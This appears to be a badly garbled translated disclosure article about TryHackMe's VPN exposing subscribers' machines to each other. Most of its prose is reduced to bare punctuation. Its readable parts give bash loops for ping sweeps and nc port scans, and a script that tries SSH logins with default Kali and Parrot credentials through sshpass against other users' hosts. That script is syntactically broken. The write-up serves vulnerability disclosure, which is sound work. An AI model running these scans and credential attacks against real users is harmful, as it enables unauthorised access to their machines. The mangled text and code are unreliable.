"Hack Me on TryHackMe", or Insecure information security research on a known platform

Hello, Khabrchane. Today we will talk about one problem discovered by my good friend Ivan Glinkin .

This is a very serious jamb with the security of the TryHackMe pentest training platform. It consists in the fact that virtual stands see absolutely everything on the network, and they can be used to attack users of the service.

3 :

  1. , . TryHackMe ;

  2. , ( );

  3. .


, . , TryHackMe, , , . .

. IT- , . , .

, , «*, *, ».

VPN , , . ? !

, ? -, , ?

! , , .

«Basic Pentesting».

As an attacker, we have ...

kay , , TryHackMe , . .

for ip in {1..254}; do ping -w 1 10.9.5.$ip | grep -i "ttl"; done

We are looking for living neighbors

. , ? , , …

Looking for more


, ! , SSH , Apache.

IP nc 80 , nc .

for ip in $(cat ips.txt); do nc -nvw 1 $ip 80; done

We are looking for an open 80 port

. CURL’ www , :

I am sure that for many people the directory of the web server on Kali looks something like this
, - Kali

, SSH. . sshpass, curl, wget . , , - .

! .

No rights.  And if I find it?
. ?

root- ! root , , , kay sudo. ?

Well, even without comment ...
, …

sshpass bash :

for ip in {2..255}
do ip_check=$(ping -w 1 10.9.5.$ip | grep -i "icmp_seq" | cut -d " " -f 4 | cut -d ":" -f 1)
if [ ! -z $ip_check ]
echo -e "\e[01;32mHost $ip_check is up. Cheking SSH\e[00m";
nc -vz -w 2 $ip_check 22 > log.txt 2>&1;
ssh_refused=$(grep -o "refused" log.txt)
ssh_timeout=$(grep -o "timed" log.txt)
if [ ! -z $ssh_refused ]
echo -e "\e[01;31mSSH is closed. Going further. \e[00m";
echo " ";
elif [ ! -z $ssh_timeout ]
echo -e "\e[01;31mSSH doesn't respond. Going further. \e[00m";
echo " ";
echo -e "\e[01;32mSSH is open. Trying to connect... \e[00m";
sshpass -p "kali" ssh -o StrictHostKeyChecking=no kali@$ip_check;
sshpass -p "toor" ssh -o StrictHostKeyChecking=no user@$ip_check;
sshpass -p "toor" ssh -o StrictHostKeyChecking=no root@$ip_check;
echo " ";
rm log.txt;
echo -e "\e[01;32mEnumeration has been finished! \e[00m";

3 / Kali Parrot OS:

  • kali:kali

  • root:toor

  • user:toor


«» . ovpn TryHackMe. VIP, …

Hello hello ovpn file

sudo …

Well, how would it be ...


, : TryHackMe **** Kali Parrot OS . «» TryHackMe? .

, , , SSH, . , :

  1. ;

  2. ;

  3. - - IP;

  4. ( , , ?);

  5. , …

, , . , , , TryHackMe , , - .

«» TryHackMe .

TryHackMe 2 2021. 25 2021. , , TryHackMe , 9 .

TryHackMe , , . - ?


. , TryHackMe. , …

, , .

: 9 .

? , , TryHackMe, Kali .

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